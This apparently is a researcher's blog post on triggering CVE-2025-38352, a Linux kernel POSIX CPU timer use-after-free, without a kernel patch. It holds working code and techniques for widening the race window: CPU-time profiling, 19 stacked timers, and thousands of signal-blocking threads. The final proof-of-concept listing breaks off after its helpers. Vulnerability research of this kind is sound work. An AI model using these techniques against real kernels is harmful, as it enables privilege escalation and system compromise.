CVE-2025-38352 (Part 2) - Extending The Race Window Without a Kernel Patch

December 23, 2025

In part 1, I went through a step-by-step process for constructing a PoC that triggers the vulnerability. Unfortunately, it had a few issues:

  1. It barely ever worked without the kernel patch I introduced that artificially extended the race window by 500ms.
  2. The timer setup itself was not very clean. There are definitely better ways to consume a controlled amount of CPU time so that the timer fires at a controlled moment in the future.

In this blog post, I will walk you through how I solved both of the above issues, and ended up with a PoC that works without any kernel patches.

PoC + Demo

As always, if you're just here for the PoC, it's linked below.

https://github.com/farazsth98/poc-CVE-2025-38352/blob/main/poc.c

And a short demo (without KASAN)! 😄

demo

For reference, my QEMU command is shown below as well:

qemu-system-x86_64 \
    -enable-kvm \
    -cpu host \
    -smp 4 \
    -kernel ./bzImage \
    -initrd ./initramfs.tgz \
    -nographic \
    -append "console=ttyS0 kgdbwait kgdboc=ttyS1,115200 oops=panic panic=0 nokaslr" \
    -m 3G \
    -netdev user,id=mynet0 \
    -device virtio-net-pci,netdev=mynet0 \
    -s

Recap

Please read part 1 of this series before continuing!

The way I consumed CPU time inside the REAPEE thread to trigger the vulnerability in my previous PoC went like this:

void reapee(void) {
    // [ ... ]

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {
            .tv_sec = 0,
            .tv_nsec = wait_time, // Custom wait time
        },
    };

    // Wait for parent to attach
    pthread_barrier_wait(&barrier);

    SYSCHK(timer_settime(timer, 0, &ts, NULL));

    // Use some CPU time to make sure the timer will fire correctly
    for (int i = 0; i < 1000000; i++);

    // Hopefully we used enough CPU time to trigger the timer after `exit_notify()`
    // zombifies us and wakes up the parent process
    return;
}

The wait_time was provided via argv, and the for loop was just set up randomly to something that worked. Basically, there is zero control over how much CPU time is consumed after the timer is set.

Can we improve this? Of course!

CPU Scheduler Internals (Not Really)

In order to understand how to control how much CPU time a thread uses, I had to do a semi-deep dive into the CPU scheduler, POSIX timers, and how the different types of CPU timers (CPUCLOCK_PROF, CPUCLOCK_VIRT, CPUCLOCK_SCHED) worked.

Summarizing Key Points

I won't go too deep into it (it deserves its own blog post, honestly), but to summarize some of the key points (summaries may not be 100% accurate):

  1. The CPU scheduler triggers an interrupt once every 1 / CONFIG_HZ seconds. This is when run_posix_cpu_timers() will run.
    • Typically, CONFIG_HZ=1000, so a CPU scheduler "tick" occurs once every 1 ms.
      • This is the case for the Android and Ubuntu kernels anyway.
  2. There are three types of CPU clock timers:
    • CPUCLOCK_PROF - Counts total CPU time consumed by userland + kernel.
    • CPUCLOCK_VIRT - Counts total CPU time consumed by userland ONLY.
    • CPUCLOCK_SCHED - Counts total time actually spent running on a CPU. Important for threads which can be scheduled in and out by the scheduler.
  3. Timer expiry checks are always done on a tick boundary, so the expiry checks can occur at most once every 1 / CONFIG_HZ seconds.
  4. CPUCLOCK_PROF and CPUCLOCK_VIRT clocks are only updated after they've used up 1 / CONFIG_HZ of CPU time.
    • CPUCLOCK_SCHED is special-cased. It updates every nanosecond instead.
    • This means that CPUCLOCK_SCHED is typically used for profiling in cases where granularity finer than 1 ms is necessary.
  5. For triggering the vulnerability, we can technically use any of the three clock types.
    • My PoC uses CLOCK_THREAD_CPUTIME_ID for the timer, which is a CPUCLOCK_SCHED timer.
    • There is a good reason to use this specific timer type, which will be explained later in this post!

That should be the minimum amount of information necessary to understand the following sections.
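To make the tick arithmetic from points 1 and 3 concrete, here is a tiny sketch. The helper names (`tick_period_ns`, `next_tick_at_or_after`) are made up for illustration, and the model is deliberately simplified: it assumes ticks land on exact multiples of the tick period and that the thread runs continuously, so CPU time and tick time advance together. The real kernel behaviour is messier than this.

```c
#include <assert.h>
#include <stdint.h>

#define NSEC_PER_SEC 1000000000ULL

// Length of one scheduler tick in nanoseconds for a given CONFIG_HZ value
static uint64_t tick_period_ns(unsigned int hz) {
    assert(hz > 0);
    return NSEC_PER_SEC / hz;
}

// Simplified model (assumption): expiry checks only happen on tick
// boundaries, so a timer expiring at `expiry_ns` is first noticed at the
// next multiple of the tick period at or after that point
static uint64_t next_tick_at_or_after(uint64_t expiry_ns, unsigned int hz) {
    uint64_t period = tick_period_ns(hz);
    return ((expiry_ns + period - 1) / period) * period;
}
```

With `CONFIG_HZ=1000`, `tick_period_ns(1000)` is 1,000,000 ns, and in this model a timer that expires 1 ns past a tick boundary is only noticed a full tick later.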

Profiling CPU Time Usage

In order to consume a controlled amount of CPU time, we need to actually know how much time some concrete amount of work uses.

For any profiling, we need to be able to fetch the amount of total CPU time consumed (by the thread being profiled) at two or more separate execution points. This can be done using the clock_gettime system call.

For the "concrete amount of work" that we'll profile, I chose the getpid system call, as it is easy to use and consumes very little CPU time.

Now, unsurprisingly, the clock_gettime system call itself also consumes CPU time, so we have to account for this overhead in our profiling code too.

To that end, here is some proof-of-concept code that can be used to figure out exactly how much CPU time the getpid system call consumes (click here for the full PoC):

#define NUM_SAMPLES 100000
static long int clock_gettime_avg = 0;

// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
long int getpid_avg_cputime_used() {
    struct timespec *ts = malloc(NUM_SAMPLES * sizeof(struct timespec));

    if (clock_gettime_avg == 0) {
        for (int i = 0; i < NUM_SAMPLES; i++) {
            syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        } 
    
        long int total_nsec = 0;
    
        for (int i = 0; i < NUM_SAMPLES-1; i++) {
            long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i]));
            total_nsec += time_taken;
        }
    
        clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
    }

    for (int i = 0; i < NUM_SAMPLES; i++) {
        syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        
        // Do whatever you're measuring here
        syscall(__NR_getpid);
    }

    long int total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES-1; i++) {
        long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i])) - clock_gettime_avg;
        total_nsec += time_taken;
    }

    free(ts);
    return total_nsec / (NUM_SAMPLES-1);
}

And here's some output from my QEMU VM (4 cores, 3GB RAM):

/ # /poc
clock_gettime avg: 489 ns
getpid avg: 139 ns
/ # /poc
clock_gettime avg: 495 ns
getpid avg: 143 ns
/ # /poc
clock_gettime avg: 491 ns
getpid avg: 133 ns
/ # /poc
clock_gettime avg: 495 ns
getpid avg: 130 ns

Obviously, the PoC uses averages, so the times aren't 100% accurate, but CPU time usage for any system call is never going to be consistent across multiple runs, so this average is as good as it gets (I think so anyway... If you have a better way to calculate this, please let me know!)
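One alternative worth trying (this is not what the PoC does, and it has not been compared against it) is to time a whole batch of calls with just two clock reads. The `clock_gettime` overhead is then spread across the entire batch instead of being subtracted from every sample. The function names below are hypothetical:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <time.h>
#include <unistd.h>

// Read the calling thread's consumed CPU time in nanoseconds
static int64_t thread_cpu_ns(void) {
    struct timespec ts;
    int rc = clock_gettime(CLOCK_THREAD_CPUTIME_ID, &ts);
    assert(rc == 0);
    (void)rc;
    return (int64_t)ts.tv_sec * 1000000000LL + ts.tv_nsec;
}

// Average CPU time per getpid() call, measured over one large batch.
// Only two clock reads are taken, so their cost is amortized over
// `iterations` calls rather than estimated and subtracted separately.
static int64_t getpid_batch_avg_ns(int iterations) {
    assert(iterations > 0);
    int64_t start = thread_cpu_ns();
    for (int i = 0; i < iterations; i++) {
        syscall(SYS_getpid);
    }
    int64_t end = thread_cpu_ns();
    return (end - start) / iterations;
}
```

The trade-off is that the loop overhead itself is folded into the average, which is arguably what we want here anyway, since the trigger loop has the same shape.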

The First Improvement - Controlled CPU Time Consumption

The first improvement we can make to our PoC is to consume CPU time in the REAPEE thread in a more controlled manner by doing the following:

  1. Use the profiling code to get the average CPU time consumed by the getpid system call.
  2. Arm the timer to fire after 1 ms (1,000,000 ns) CPU time is consumed.
  3. Run the getpid system call in a loop enough times to consume close to the 1 ms of CPU time (but crucially, not all of it!).

At this point, any remaining CPU time will be used by the kernel in do_exit() -> exit_notify(), and if the getpid system call loop consumed just enough CPU time, the timer should fire and trigger handle_posix_cpu_timers() after exit_notify() zombifies the REAPEE thread and wakes up the reaping parent process.

Note: The 3rd step above can be made more accurate by profiling how much CPU time is used by do_exit() -> exit_notify() (by patching the kernel), but I did not bother with this step yet.
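The arithmetic behind step 3 can be sketched as follows. The names `getpid_loop_iterations`, `headroom_ns` and `slack_calls` are illustrative only; `slack_calls` stands for the number of `getpid` calls deliberately left out so that the timer does not fire inside the loop. The guard against a non-positive average is an addition of this sketch.

```c
#include <assert.h>

#define ONE_MS_NS 1000000LL

// Number of getpid() calls to make: as many as fit into 1 ms of CPU time,
// minus `slack_calls` calls that are intentionally left unused
static long long getpid_loop_iterations(long long avg_ns, long long slack_calls) {
    assert(avg_ns > 0); // a zero or negative average would break the division
    long long n = ONE_MS_NS / avg_ns - slack_calls;
    return n > 0 ? n : 0;
}

// Estimated CPU time left over for the exit path before the timer expires
static long long headroom_ns(long long avg_ns, long long slack_calls) {
    return ONE_MS_NS - getpid_loop_iterations(avg_ns, slack_calls) * avg_ns;
}
```

For example, with an average of 139 ns per call and a slack of 20 calls, this gives 7174 loop iterations and roughly 2814 ns of headroom for `do_exit()` -> `exit_notify()`.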

Here are the improvements shown in the PoC:

// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
getpid_avg = getpid_cpu_usage();

// [ ... ]

// After timers are armed, waste just the right amount of CPU time now 
// without firing any of the timers
for (int i = 0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
    syscall(__NR_getpid);
}

// This `return` will trigger `do_exit()` in the kernel, which hopefully will
// fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
// parent process
return;

In the above PoC, syscall_loop_times is a variable that starts at 20 and is incremented on each retry; once it goes past SYSCALL_LOOP_TIMES_MAX=150, my PoC wraps it back to 20. Since the amount of CPU time used is never perfectly predictable, sweeping this value across retries means that, sooner or later, one of the attempts should leave just the right amount of CPU time for the race to hit.
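The retry schedule for this value, as implemented by the wrapper process in the full PoC at the end of this post, boils down to the following. The function name and `SLACK_START` are made up for this sketch; the arithmetic mirrors the wrapper's three update lines.

```c
#include <assert.h>

#define SLACK_START 20
#define SYSCALL_LOOP_TIMES_MAX 150

// Compute the value used by the next retry: increment by one, and wrap
// back to the starting value once SYSCALL_LOOP_TIMES_MAX is exceeded
static int next_syscall_loop_times(int current) {
    assert(current >= SLACK_START && current <= SYSCALL_LOOP_TIMES_MAX);
    int next = (current + 1) % (SYSCALL_LOOP_TIMES_MAX + 1);
    return next == 0 ? SLACK_START : next;
}
```

So the value sweeps 20, 21, ..., 150 and then starts over at 20, which means every slack value in that range is tried again and again.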

This one change drastically improves the likelihood of handle_posix_cpu_timers() running after exit_notify() wakes up the reaping parent process.

Additionally, it also makes the PoC system-agnostic, as different systems will consume different amounts of CPU time for the same amount of work.

Extending The Race Window - Part 1

Now for the second (and arguably more annoying problem): how do we extend the race window?

Using More Timers

The first improvement we can make should be obvious. Remember that handle_posix_cpu_timers() collects all firing timers in a local firing list, and then iterates over them (code simplified below):

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
	// Faith: local `firing` list
	LIST_HEAD(firing);

	if (!lock_task_sighand(tsk, &flags))
		return;

	do {
		// [ ... ]
        // Faith: collect all thread and process timers
		check_thread_timers(tsk, &firing);
		check_process_timers(tsk, &firing);
	} while (!posix_cpu_timers_enable_work(tsk, start));

	// [ ... ]
	unlock_task_sighand(tsk, &flags);

	// Faith: iterate over the `firing` list and fire the timers
	list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
		// [ ... ]
	}
}

My old PoC only used one timer, which means that the firing list is only iterated over once. Not a lot of time for us to free the timer before it's used, right?

We can improve on this by doing two things:

  1. Fill up the firing list to its max capacity.
  2. Make the very last timer on the firing list our target UAF timer.

Now, handle_posix_cpu_timers() calls check_thread_timers() before check_process_timers(). Since timers are inserted at the tail of the firing list, we can't make use of process timers, as they will all be inserted after our UAF timer.

That leaves us with thread timers. How many can we insert into the firing list?

static void check_thread_timers(/* ... */)
{
	struct posix_cputimers *pct = &tsk->posix_cputimers;
	u64 samples[CPUCLOCK_MAX];
	// [ ... ]

	task_sample_cputime(tsk, samples);
	collect_posix_cputimers(pct, samples, firing);
    // [ ... ]
}

static void collect_posix_cputimers(/* ... */)
{
    // [ ... ]
	for (i = 0; i < CPUCLOCK_MAX; i++, base++) {
		base->nextevt = collect_timerqueue(&base->tqhead, firing,
						    samples[i]);
	}
}

#define MAX_COLLECTED	20

static u64 collect_timerqueue(/* ... */)
{
	// [ ... ]
	while ((next = timerqueue_getnext(head))) {
		// [ ... ]
		/* Limit the number of timers to expire at once */
		if (++i == MAX_COLLECTED || now < expires)
			return expires;

		// [ ... Add the timer to the `firing` list's tail here ... ]
	}

	return U64_MAX;
}

In the above code, CPUCLOCK_MAX signifies the three types of clocks mentioned in the CPU Scheduler Internals section, so it is set to 3.

Additionally, note that the MAX_COLLECTED check in collect_timerqueue() above is actually off-by-one. So instead of allowing a maximum of 20 timers to be collected per clock type, it only collects up to 19 timers instead.

So putting all of that together, we can collect up to 19 * 3 = 57 timers in the firing list. And to top it off, we have some luck on our side: CPUCLOCK_SCHED (which is the clock type we use to create the UAF timer) is the very last clock type!

#define CPUCLOCK_PROF		0
#define CPUCLOCK_VIRT		1
#define CPUCLOCK_SCHED		2
#define CPUCLOCK_MAX		3
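To sanity-check the 19-per-clock figure, here is a small userland model of the counting logic in collect_timerqueue(). It is only a sketch: it assumes every queued timer has already expired (so the `now < expires` condition never triggers), and the `model_*` function names are made up.

```c
#include <assert.h>

#define MAX_COLLECTED 20
#define CPUCLOCK_MAX 3

// Model of the loop in collect_timerqueue(): `expired_queued` is the number
// of already-expired timers sitting on one clock's timer queue
static int model_collect_timerqueue(int expired_queued) {
    assert(expired_queued >= 0);
    int i = 0;
    int collected = 0;
    while (collected < expired_queued) {
        // Same pre-increment check as the kernel: bail out on the 20th pass,
        // before that timer is moved to the firing list
        if (++i == MAX_COLLECTED)
            break;
        collected++;
    }
    return collected;
}

// Upper bound on thread timers collected across all three clock types
static int model_max_firing_list_len(int expired_per_clock) {
    int total = 0;
    for (int clk = 0; clk < CPUCLOCK_MAX; clk++)
        total += model_collect_timerqueue(expired_per_clock);
    return total;
}
```

Queuing 20 or more expired timers on one clock still only collects 19 of them, and three clocks give 57 in total.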

In my PoC, I only used 19 CPUCLOCK_SCHED type timers, as that ends up extending the race window enough to trigger the vulnerability.

However, since exploitation will very likely require using the cross-cache technique to re-allocate the freed struct k_itimer as something else, I will probably have to end up using all 57 timers here later on. This is also the reason I used CPUCLOCK_SCHED type timers for the PoC, as it gives us the largest potential race window.

Firing All Timers At Once

In order to fire all timers at once, we can utilize the fact that a CLOCK_THREAD_CPUTIME_ID type timer will only progress if the thread that creates the timer consumes CPU time.

So to fire all 19 timers at once, we just need to do the following:

  1. Create all 19 CPU timers (18 "stall" timers + our UAF timer) on our REAPEE thread, then put it to sleep.
    • Ensure it's not a busy sleep, so it doesn't consume CPU time.
    • I used a pthread_barrier_t to achieve this.
  2. On another thread, call timer_settime() to arm all timers to fire after 1,000,000 ns (1 ms) of CPU time is consumed.
    • Since this thread did not create the timers, the timers will not progress at all (because the REAPEE thread, which is sleeping, is the only one that can progress these timers).
  3. Make sure to set the 18 "stall" timers to fire after 1,000,000 - 1 ns of CPU time is consumed.
    • The UAF timer must still fire after 1,000,000 ns of CPU time is consumed.
    • This step ensures that the UAF timer is the last on the firing list, as timers are moved onto the firing list in order of their expiry time.

After doing the above, we can wake up the REAPEE thread and use our improvements from the previous section to consume just less than 1 ms of CPU time to trigger handle_posix_cpu_timers() at the right time.
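The expiry values from steps 2 and 3 can be prepared like this. It is a minimal sketch rather than the exact code from the PoC; `fill_one_shot` and `fill_expiries` are hypothetical helpers that only fill in the `struct itimerspec` values.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <time.h>

#define ONE_MS_NS 1000000L

// Fill in a one-shot (non-repeating) expiry of `nsec` nanoseconds
static void fill_one_shot(struct itimerspec *its, long nsec) {
    assert(nsec >= 0 && nsec < 1000000000L);
    its->it_interval.tv_sec = 0;
    its->it_interval.tv_nsec = 0;
    its->it_value.tv_sec = 0;
    its->it_value.tv_nsec = nsec;
}

// Stall timers expire 1 ns earlier than the UAF timer, so that the UAF
// timer is ordered after all of them
static void fill_expiries(struct itimerspec *stall, size_t num_stall,
                          struct itimerspec *uaf) {
    for (size_t i = 0; i < num_stall; i++)
        fill_one_shot(&stall[i], ONE_MS_NS - 1);
    fill_one_shot(uaf, ONE_MS_NS);
}
```

The main thread would then pass each of these to `timer_settime(timer, 0, &its, NULL)` for the corresponding timer while the REAPEE thread is still blocked on the barrier.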

How Much Did It Help?

In order to figure out how much CPU time is actually being consumed by the firing list iteration in handle_posix_cpu_timers(), I used the following kernel patch. I made sure the patch itself does not extend the race window (my final PoC works without this patch).

The important part of the patch is shown below. It profiles how much time is spent iterating over the firing list and firing each timer:

@@ -1356,6 +1362,10 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
 	 */
 	unlock_task_sighand(tsk, &flags);
 
+	// Faith: profile the time taken to handle the timers
+	if (profile)
+		profile_t0 = ktime_get_mono_fast_ns();
+
 	/*
 	 * Now that all the timers on our list have the firing flag,
 	 * no one will touch their list entries but us.  We'll take
@@ -1387,6 +1397,13 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
 		rcu_assign_pointer(timer->it.cpu.handling, NULL);
 		spin_unlock(&timer->it_lock);
 	}
+
+	// Faith: profile the time taken to handle the timers
+	if (profile) {
+		profile_t1 = ktime_get_mono_fast_ns();
+		printk("handle_posix_cpu_timers: delta_ns=%llu\n",
+			(unsigned long long)(profile_t1 - profile_t0));
+	}

The PoC I used to test this profiling code can be seen here. Note that this profiling PoC also includes changes that extend the race window even further (I'll discuss them in the next section).

The important parts of the PoC are as follows (follow the links):

  1. REAPEE thread creates the 19 timers and goes to sleep.
  2. Main thread arms all 19 timers and wakes up the REAPEE thread.
  3. REAPEE thread uses up more than enough CPU time to trigger handle_posix_cpu_timers().

The dmesg logs after running this PoC (without the extra changes that increase the race window even more) are as follows:

~ $ /poc
[   10.543155] handle_posix_cpu_timers: delta_ns=3140
~ $ /poc
[   10.964147] handle_posix_cpu_timers: delta_ns=4990
~ $ /poc
[   11.404146] handle_posix_cpu_timers: delta_ns=6000

In my testing, iterating over the 19 timers in the firing list typically takes somewhere between 4000 and 7000 ns (the first run above was a little faster).

From my testing, this is still not enough to trigger the vulnerability:

  1. It's still incredibly difficult to hit this race window with our timer_delete() after reaping the zombie REAPEE thread.
  2. There's basically no time for the RCU free to occur even if we win the race.

So, we need to figure out how to extend the race window even further... Nanoseconds aren't enough, we need milliseconds!

Extending The Race Window - Part 2

On a high level, we have two other options to extend the race window:

  1. The list iteration attempts to acquire both the timer->it_lock, and later the task->sighand->siglock. If another CPU can hold these locks for an extended period of time at the right moment, we can extend the race window.
  2. Firing timers involves sending signals, re-arming timers, and a bunch of other things. Maybe we can study that flow to figure out how to extend the race window?

Option 1 - Lock Collisions

I audited all the code paths that acquire timer->it_lock and task->sighand->siglock to figure out if there were any good options that allowed holding the locks for an extended amount of time. However, there are a few issues with this approach.

The first issue with both locks has to do with the short race window. Not only do we need to acquire either lock inside the race window, but we also need to acquire it right when the firing list is about to acquire the lock for that specific timer / task. This is incredibly difficult to do within the 4000-7000 ns race window.

The second issue is that I could not find any code paths that acquired the locks for a large / controlled amount of time. For example, even though timer_gettime() calls copy_to_user(), it drops the timer->it_lock before doing so. Overall, all the code paths acquired and dropped the locks very quickly.

However, I learned something a while ago from a blog post by Jann Horn - preemptible kernels like the Android kernel can preempt code at any point, unless the code is running in some context where preemption is disabled.

Knowing this, could I somehow cause timer->it_lock / task->sighand->siglock to be acquired by a task on another CPU, and then have that task be preempted so that the lock is held for an extended period of time?

Unfortunately, the answer was no. Both of these locks are acquired via spin_lock()/spin_lock_irq()/spin_lock_irqsave(), all of which disable preemption while the lock is held.

Therefore, lock collisions were definitively out of the question.

Option 2 - Firing Timers For Longer

I spent a while auditing through cpu_timer_fire() to see how the timer firing logic was implemented. I was mainly looking for loops where I could have some control over the number of iterations from userland.

The function complete_signal() caught my eye. It can be reached via the following call stack:

handle_posix_cpu_timers()
-> cpu_timer_fire()
-> posix_timer_queue_signal()
-> send_sigqueue()
-> complete_signal()

Inside complete_signal(), I noticed two while loops (code simplified below):

static void complete_signal(int sig, struct task_struct *p, enum pid_type type)
{
	// [ ... ]
    // Faith: If a PID is specified to deliver the signal to, and that thread / process
    //        is accepting this signal, use it
	if (wants_signal(sig, p))
		t = p;
    // Faith: Else if that PID does not accept this signal, and the signal is
    //        thread-directed (or there are no other threads), just return early.
	else if ((type == PIDTYPE_PID) || thread_group_empty(p))
		return;
	else {
		// Faith: iterate over every thread until we find one that is accepting this
        //        signal
		t = signal->curr_target;
		while (!wants_signal(sig, t)) {
			t = next_thread(t);
			if (t == signal->curr_target)
				// Faith: no thread found accepting this signal, just return
				return;
		}
		signal->curr_target = t;
	}

	// Faith: If a fatal signal is detected (and some other conditions)
	if (sig_fatal(p, sig) &&
	    (signal->core_state || !(signal->flags & SIGNAL_GROUP_EXIT)) &&
	    !sigismember(&t->real_blocked, sig) &&
	    (sig == SIGKILL || !p->ptrace)) {
		// [ ... ]
        // Faith: The code here iterates over every thread in this thread
        //        group and delivers a `SIGKILL` to it to kill it.
	}
    // [ ... ]
}

In this code above, we have two loops.

  1. The first while loop is entered if we make the timer send a signal without specifying a TID. It will iterate over every thread in the thread group to find one that does not have this signal blocked (signals can be blocked via sigprocmask()).
  2. The second loop is elided in the snippet above, but it is only entered if the signal to be delivered is considered fatal (plus some other conditions). This will actually kill every thread in this thread group.

Now, I believe the second loop is practically unusable because it kills every thread in the thread group. But I don't want to eat my words later 😅 There could be a scenario where multiple processes can be synced up to all have their timers fire on the same CPU. In such a scenario, these other "useless" processes can get killed without affecting the main exploit process, possibly making the second loop exploitable after all. However, I have not tested nor verified this.

In my PoC, I only used the first while loop to extend the race window. Let's look at how to do that now, shall we?

The Second Improvement - Spamming Threads

From looking at complete_signal() above, we see that it iterates over every single thread in the current process until it finds one that "wants" the signal.

So, how is wants_signal() implemented? (code simplified below):

static inline bool wants_signal(int sig, struct task_struct *p)
{
	if (sigismember(&p->blocked, sig))
		return false;

	// [ ... ]
}

There were actually a few more conditions in wants_signal(), but the first thing it checks is to see if the thread is blocking the signal that the timer is trying to send.

The ->blocked field contains a bitmap of signals to block. It can have signals added to it by using sigprocmask() with SIG_BLOCK (code simplified below):

int sigprocmask(int how, sigset_t *set, sigset_t *oldset)
{
	// [ ... ]
	switch (how) {
	case SIG_BLOCK:
		sigorsets(&newset, &tsk->blocked, set);
		break;
	// [ ... ]
	}

	__set_current_blocked(&newset);
	return 0;
}

So, knowing the above, we have a way to force the kernel to iterate over this while loop as many times as we want for each of our 18 "stall" timers. We're only limited by how many threads we can create.
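As a rough userland model of that while loop, the sketch below counts how many wants_signal() checks one walk performs. It is a simplification: the thread group is modelled as a circular array of "blocked" flags, only the `->blocked` check is considered, and `model_target_walk` is a made-up name.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

// Walk the (circular) thread list starting at index `start`, like the loop
// in complete_signal() starts at signal->curr_target. Returns the number of
// wants_signal()-style checks performed; `*found` reports whether any
// thread accepted the signal.
static size_t model_target_walk(const bool *blocked, size_t num_threads,
                                size_t start, bool *found) {
    assert(num_threads > 0 && start < num_threads);
    size_t checks = 0;
    size_t t = start;
    for (;;) {
        checks++;
        if (!blocked[t]) {      // this thread "wants" the signal
            *found = true;
            return checks;
        }
        t = (t + 1) % num_threads;  // next_thread(t)
        if (t == start) {       // wrapped around: nobody wants it
            *found = false;
            return checks;
        }
    }
}
```

When every thread blocks the signal, the walk performs one check per thread before giving up, which is exactly the worst case we want to force for each stall timer.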

The steps to achieve this are as follows:

  1. Before creating any threads in the exploit child process, block SIGUSR1 via sigprocmask().
    • The exploit child process is the one that contains the REAPEE thread.
  2. Create the REAPEE thread. When creating the timers, ensure the timer's sigevent.sigev_notify is set to SIGEV_SIGNAL.
    • This will try to send the signal to any thread in the current thread group that accepts the signal.
  3. Create as many threads as possible in the exploit child process (I used NUM_SLEEP_THREADS=10000).
    • These threads (and the REAPEE thread from above) will inherit the blocked SIGUSR1 from the exploit child process.
  4. Continue with triggering the vulnerability as usual.
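Steps 1 and 3 rely on new threads inheriting the signal mask of the thread that creates them. The sketch below demonstrates just that inheritance in isolation, with a handful of short-lived threads instead of 10000 sleepers. It uses `pthread_sigmask()` rather than `sigprocmask()`, and the function names are made up for illustration.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <pthread.h>
#include <signal.h>
#include <stdlib.h>

// Thread body: record whether SIGUSR1 is blocked in this thread's mask
static void *report_sigusr1_blocked(void *arg) {
    int *blocked = arg;
    sigset_t cur;
    sigemptyset(&cur);
    // With a NULL `set`, pthread_sigmask() only queries the current mask
    pthread_sigmask(SIG_BLOCK, NULL, &cur);
    *blocked = (sigismember(&cur, SIGUSR1) == 1);
    return NULL;
}

// Block SIGUSR1 in the caller, spawn `num_threads` threads, and return how
// many of them started with SIGUSR1 blocked (-1 on setup failure)
static int count_threads_blocking_sigusr1(int num_threads) {
    assert(num_threads > 0);
    sigset_t mask;
    sigemptyset(&mask);
    sigaddset(&mask, SIGUSR1);
    if (pthread_sigmask(SIG_BLOCK, &mask, NULL) != 0)
        return -1;

    pthread_t *threads = calloc((size_t)num_threads, sizeof(*threads));
    int *blocked = calloc((size_t)num_threads, sizeof(*blocked));
    if (!threads || !blocked) {
        free(threads);
        free(blocked);
        return -1;
    }

    int created = 0;
    for (; created < num_threads; created++) {
        if (pthread_create(&threads[created], NULL, report_sigusr1_blocked,
                           &blocked[created]) != 0)
            break;
    }

    int count = 0;
    for (int i = 0; i < created; i++) {
        pthread_join(threads[i], NULL);
        count += blocked[i];
    }
    free(threads);
    free(blocked);
    return count;
}
```

Every thread created after the mask change should report the signal as blocked, so none of them "wants" the timer's signal.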

Once the timers fire, the firing list iteration inside handle_posix_cpu_timers() will call into complete_signal() once for each timer, and each timer will iterate NUM_SLEEP_THREADS=10000 times in the while loop inside complete_signal() before returning.

I've already implemented this in the same profiling PoC from before. Running this with this second improvement results in the following output:

~ $ /poc
[    2.386969] handle_posix_cpu_timers: delta_ns=4895749
~ $ /poc
[    3.101971] handle_posix_cpu_timers: delta_ns=3904588
~ $ /poc
[    3.679125] handle_posix_cpu_timers: delta_ns=4052398

A huge improvement! The amount of time spent iterating over the firing list is now between 4,000,000-5,000,000 ns (4-5 milliseconds)! This is definitely more than enough time to both:

  1. Hit timer_delete() inside the race window.
  2. Let the RCU free complete so that the UAF can trigger.

With this, the PoC can trigger the race condition without any artificial kernel patches.

Some Miscellaneous Improvements And Ideas

I also made a few more improvements to the final PoC:

  1. I implemented the retry logic directly in the PoC, so you can just run /poc instead of while true; do /poc; done.
  2. I added a 1 ms sleep before deleting the timer. Since the race window is going to be open for at least 3 milliseconds, this is useful to guarantee that the timer_delete() actually lands inside the race window.
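For the second item, a 1 ms delay can be implemented along these lines. This is a sketch with a hypothetical helper name (`sleep_ns`), not necessarily how the PoC does it; it restarts the sleep if a signal interrupts it.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <time.h>

// Sleep for `nsec` nanoseconds (less than one second), resuming with the
// remaining time if nanosleep() is interrupted by a signal
static int sleep_ns(long nsec) {
    assert(nsec >= 0 && nsec < 1000000000L);
    struct timespec req = { .tv_sec = 0, .tv_nsec = nsec };
    while (nanosleep(&req, &req) == -1) {
        if (errno != EINTR)
            return -1;
    }
    return 0;
}
```

Calling `sleep_ns(1000000)` right before `timer_delete()` on the UAF timer gives the delay described above.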

Plans On Part 3?

At the time of writing this post, I'm definitely planning on continuing to work on the exploit for this vulnerability. Cross-cache is very doable here, it's just a matter of figuring out when we win vs when we lose the race.

However, since it's the holiday season now, it will be a while before I get around to finishing this. But rest assured! This has been a really good vulnerability to practice and improve my exploit development skills with, so I have a good feeling about finishing this! 😄

Conclusion

As always, if you have any questions, please don't hesitate to ask!

Final PoC

The final PoC, along with the kernel profiler patch (and the profiling PoC I used to test the length of the race window) can all be found on my Github repo:

https://github.com/farazsth98/poc-CVE-2025-38352

I'll also put the demo and PoC below. This is the end of the blog post!

demo
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>

#define SYSCHK(x) ({            \
    typeof(x) __res = (x);      \
    if (__res == (typeof(x))-1) \
      err(1, "SYSCHK(" #x ")"); \
    __res;                      \
})

#define NUM_SAMPLES 100000
#define NUM_TIMERS 18
#define ONE_MS_NS 1000000uLL
#define NUM_SLEEP_THREADS 10000
#define NUM_SLEEP_THREADS_KASAN 4500 // KASAN has a smaller thread limit
#define SYSCALL_LOOP_TIMES_MAX 150

void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

void wait_for_rcu() {
    syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}

static inline long long ts_to_ns(const struct timespec *ts) {
    return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec;
}


static long int clock_gettime_avg = 0;
static long int getpid_avg = 0;

